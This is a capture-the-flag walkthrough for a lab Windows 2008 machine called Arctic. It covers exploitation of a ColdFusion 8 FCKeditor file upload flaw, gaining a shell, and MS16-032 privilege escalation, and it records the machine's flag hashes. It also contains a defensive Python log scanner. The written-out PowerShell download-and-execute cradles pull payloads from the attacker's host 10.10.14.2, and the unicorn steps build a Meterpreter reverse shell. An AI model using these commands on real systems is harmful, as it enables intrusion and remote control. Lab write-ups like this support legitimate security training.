# Arctic

## Arctic 10.10.10.11

### Target Enumeration:

OS: Windows 2008

IP: 10.10.10.11

User: 02650d3a69a70780c302e146a6cb96f3

Root: ce65ceee66b2b5ebaff07e50508ffb90

### Ports / Services / Software Versions Running

```
135/tcp   open  msrpc  Microsoft Windows RPC
8500/tcp  open  http   JRun Web Server
49154/tcp open  msrpc  Microsoft Windows RPC
```

### Vulnerability Exploited:

ColdFusion 8.0.1 Arbitrary File Upload and Execute

This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.

<https://www.rapid7.com/db/modules/exploit/windows/http/coldfusion_fckeditor>
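The upload-and-execute flaw described above, seen from the defender's side. This is an added example, not code from this write-up or from the Metasploit module: it scans web-server access logs for a POST to the FCKeditor connector whose `CurrentFolder` parameter names a server-side script or carries a null byte, and for a later successful request by the same client for the dropped script. The connector path (CVE-2009-2265) and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed connector location on ColdFusion 8 (CVE-2009-2265); not from the write-up.
CONNECTOR = "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm"
EXEC_EXT = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")  # served as code by ColdFusion/JRun
# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_line(line):
    """Split one access-log line into the fields the checks below need."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    url = urlsplit(target)
    return {"client": client, "method": method, "path": url.path,
            "query": parse_qs(url.query, keep_blank_values=True), "status": int(status)}

def is_upload_abuse(req):
    """POST to the connector whose CurrentFolder names a script or carries a null byte."""
    if req["method"] != "POST" or req["path"].lower() != CONNECTOR.lower():
        return False
    for folder in req["query"].get("CurrentFolder", []):
        folder = unquote(folder).lower()  # second decode catches double-encoding
        if "\x00" in folder or folder.rstrip("/").endswith(EXEC_EXT):
            return True
    return False

def scan(log_text):
    """Alerts as (kind, client, path): the upload, then later 200 GETs of scripts by that client."""
    alerts, suspects = [], set()
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        if is_upload_abuse(req):
            alerts.append(("fckeditor-upload", req["client"], req["path"]))
            suspects.add(req["client"])
        elif (req["client"] in suspects and req["method"] == "GET"
              and req["status"] == 200 and req["path"].lower().endswith(EXEC_EXT)):
            alerts.append(("dropped-file-hit", req["client"], req["path"]))
    return alerts

# Constructed sample log; the last line is a benign connector call that must not fire.
SAMPLE_LOG = """\
10.10.14.2 - - [01/Jan/2017:10:01:09 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/x.jsp%00 HTTP/1.1" 200 311
10.10.14.2 - - [01/Jan/2017:10:01:15 +0000] "GET /userfiles/file/x.jsp HTTP/1.1" 200 42
10.10.10.50 - - [01/Jan/2017:10:02:00 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/images/ HTTP/1.1" 200 311
"""
```

Running `scan(SAMPLE_LOG)` yields two alerts for 10.10.14.2 and none for the benign upload from 10.10.10.50.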

### Privilege Escalation:

MS16-032 Secondary Logon Handle Privilege Escalation

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

### Replicating the exploit:

Nmap TCP

<div align="left"><img src="https://lh3.googleusercontent.com/rQsD9798baGCcZ9iodTNI_Rt7rDpI6tRiaRFM-MFlMyxTZKe9NT4es4m2smQiTOpCQXVA8Zja4G3G6wNh3Lo9d5VcLfsnZz_rR4alJR_Jl3X9rvt9PwOMqMLKpnaMJe9nek1s4Fi" alt=""></div>

Webapp on port 8500

<div align="left"><img src="https://lh5.googleusercontent.com/kuYTiynVBRPlkT4aQH2wqTdVDeVCskowOHtVZLa-GcfKNmuVPrRTSv-nkpcs7kdGMFF3AxSOVpMqXryiQVNSkTZDXThqwx0b_lVCKjBg7z7GcpE0P2VpRJTeM-DysrXLnW2lNDRn" alt=""></div>

Dir search

<div align="left"><img src="https://lh6.googleusercontent.com/LystpZDSRBCdo59bGUAbA8Ac9PWT4ot0_MdcEZUyUe4h2SjZIeV7s8doLKI0UanWX3o88cjE1OXMH_xXlmWLU1ipJWXoLhc6Ujx8X7FdbRV4FdI9E0vK86bcd38k8pTv2Okth5UO" alt=""></div>

The administrator page reveals ColdFusion version 8.

<div align="left"><img src="https://lh6.googleusercontent.com/8e-2EJlRxvvPoIb4H7fX5H_LezWLvIH9FFU3O8mG7IlX4oWHYoCwhJ8f7urTIIS7g797qYeYWsdPCfpi5Ph7pjYSN1dglpSqZZPSi7VfoyN2UkfA5A32IwbHgQSNAbkVxsGGwjKI" alt=""></div>

Searchsploit

![](https://lh4.googleusercontent.com/Z_OhM1ed_Qt2CwRsKwuiMEdi4iGj4jnBMwlsRcnHMMPdKkmmiv2BXDgSxB03CkQLrPm754--EuaZ2r3KwljAkZMPiPyF4TXJigpJPUJiyr0QL9BNsp3q4rN257kHBfJLxhFPiQCs)

Found the Metasploit version of the exploit.

<div align="left"><img src="https://lh5.googleusercontent.com/osA36gzfIIFMgYjPjt6DjVYKqzqNRLHXzz9xrXFck48Kxc-aaIN-G5fy5Bu3oqFxD8DQYh51FwWNl0_SawicVVpyqGBAy9mBeqHwvd9qd-KDJepiLmbzip9yhXvtPG944rIPdj3Z" alt=""></div>

Set options as follows

<div align="left"><img src="https://lh6.googleusercontent.com/gYAGuFA0W3gcLzYLZxxiuk4IkDQfFdHhX48_jMtkDV8OgQEZNQdQB3RolFp6djlKRoOFZdq2SR8B5dCk2yKoxj3KVX1WNL45PHENpRVeqkL6GGu9Ja2v90Nm_snJOGjJnRIReVsE" alt=""></div>

Start a Burp listener on 127.0.0.1:8500.\
Check that it works in the browser.

<div align="left"><img src="https://lh4.googleusercontent.com/1gNRkyjwYhT94tt1bONZEC1phaUstdlHB312R8zHuR_s23g0zhxYsQUoQx8wginQFg5vs6m8AtbdtgSBcu7LyreNQtA5q7Lqhdely03c3EMaiLrQalKSiSxAjaGpC0msTP1En6Gv" alt=""></div>

Capture the request in burp

<div align="left"><img src="https://lh6.googleusercontent.com/36fRpb13M5XeO4lPgDGjGCBoHDtsrSGeBec8knPv4Sv60lyzTpbmEVsF-DL1dV5cQw3dMmyusx_hQIGMXWfS-JkTp_H7c4398t9Fp8A4y38WAD4Ri0jTlbiuG6rtS2ZIyg_TXyL1" alt=""></div>

Check the filename it is writing to.

![](https://lh6.googleusercontent.com/24RTUTRPWpjrA5DSCkoeyZ1DbXLJnpNdSR7AVjSwOqzSzlPphIiWg4DDpy1WVP6C_fCB0iBNWAr9vh9KOOlPxwbmES4Df4Rx-juJHNy0qxV2LiDNa6rEfE8XKe8eflpHw0lxaOFD)

Navigate to that file in the browser and set up your nc listener on port 4444.

<div align="left"><img src="https://lh3.googleusercontent.com/VwnYgvV0wIZ77urrmUGOpHs8etjPpCrHmMaVYhd20dsc3-_8ADtL10oeI36D13ias0VwqoHexC4NE1S96d5lIoOfJ9qo_784mSFc88sr0vP_eHyU1hSm1JPaERJGMsFsdMato0JQ" alt=""></div>

Like so

<div align="left"><img src="https://lh5.googleusercontent.com/HbcGu6qsW2JPEiV9N5AD-xHnIWIuvzJNIXJxvpLujNpm-meSd-GNILrHU_iofLq_c8K0VndzdWtD3kzGguAYOz6z8wMr7sHo0B2SvouCuZp88HdkB_hyO9OT8-2rqveJFSqzoCks" alt=""></div>

Gather system info, etc.

<div align="left"><img src="https://lh4.googleusercontent.com/nFtCmR7Kt9UbqhU6NEPMppsi6K-eXGGeKsGOSNJMbBJM7JKsnCFZsg3eMVwFOyr1bkiqGV4n3IuDT4JDBXZxBs9GSgue84cD412U4QYsgiyzOW0Ab-kFsWwT_c7PcDFjOvKOFPUF" alt=""></div>

Grab the user file.\
Execute Sherlock.ps1 after copying it to your pwd and starting your web server.

```
echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -
```

That did not work, so try getting a Meterpreter shell instead.

```
git clone https://github.com/trustedsec/unicorn.git
python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 4445
msfconsole -r unicorn.rc
cat powershell_attack.txt > exploit.html
```

Open exploit.html in nano.\
Delete the leading `powershell ...` invocation up to and including the quote before `sv`, and delete the matching quote at the end of the file.

Copy it to your web server.

Run the following on Arctic:

```
powershell "iex(new-object net.webclient).downloadstring('http://10.10.14.2/exploit.html')"
```

![](https://lh4.googleusercontent.com/hly53ngzcyjgmxfDWKeX7t8UVg2OyDBchHuDaiEyjM-RVM4oH7whJeSMfboUY9wMWQb2qv2c698ggpL5CG_JlDq1TLEOXL6-9f3C0jBoxrAvujLAmPUvOmzuTzCmkZKOgwWJQPLx)

Check Meterpreter for the new session.

![](https://lh3.googleusercontent.com/DRMqijn08w7p5HoBftj_Cyjta8WmCL1dr5NtB9OsmPPQAwLIuvYucg78ajj2xIfMrjTVTToLXQf1oJfv11W-Ss6_T-64p2mEu26HJwDZxnd-Ovba_u2PcpF3pJA1H3Qx2dnZx86X)

Run the local exploit suggester (32-bit).

![](https://lh6.googleusercontent.com/tPpB5D_TUc8OLPoRcLf3Is0HEj4PTL73ic1KcKlwM-0Tpeyur5FhzVGQWwttyGYusd8_mm-EBq7ozUUGZc3VnEwfl4tI55k6Sma8a5GRSvqNY_vGvdAFB4PyjY1Qy6sKRoKfG0Mm)

This ran as a 32-bit process, so switch back to Meterpreter and move to a 64-bit process.

![](https://lh3.googleusercontent.com/Gk_VU_0WPnySHy6cxBG4GjjAO_9OHxhooq40hZyNTR-u5wM1e8ktNvrGBN8_WaMXVqqUZSSB9gMDS-qL53Swv2WCHictvD_6b8MqmTF1b4L9iHjW8ytJMsmOf0kt1aAfZU5QgoqY)

Only one suggestion comes back when run as 64-bit.

![](https://lh3.googleusercontent.com/irTJahshcZWGulq2uB9ZbgoZrpdXZ883WavDI1Xu5a-TQTuqVZbh5YB5q_P_G_sJO9NjgsAgvIi8MKhvuG0qmbb21pwTtwhK4eM28FSFF6fDi6Ld1YIO8yoHlhKw0sUV1EyIFdhr)

Set your options as follows:

![](https://lh6.googleusercontent.com/KuRMdA7m9uHcuhsl17__0SjlKxWizUimMVI7Lk9d0Gq8psX3j3UOEy4dttFVwt4IkHilOcxqxX_j8YbEAPJGIjV-kEAiS3SB9y6heGLe6XKZlgarb_6Ccv0EgS0xKsDWHrP1RRKf)

Run the exploit to get a SYSTEM shell.

![](https://lh5.googleusercontent.com/DfzJYShYbWuoU_8xohP19Q7dig_1tDy6FJXiWWAxt1cFBSZZ710wNef4B-WvqCpQ3CbDH8H_UqKbZdx0003QmbRvLTyUXIeptXZ3LpSxdgSnciBvS3Svv69v__A4iKrYQRrlWKsd)

Root.txt

<div align="left"><img src="https://lh5.googleusercontent.com/N-U1cQPd1HK3tLN4L3QuhZgWU0WRHHCLYFrqk6xgg1Y74kATR8tnHrI5zwYCwo8nI9xLVl-FbQTDyEblkNu0ezi6kcX3Q3-pYrLML0rJ1VgEhcmkoR6Luq5AiWng99pIXW6A5xWa" alt=""></div>
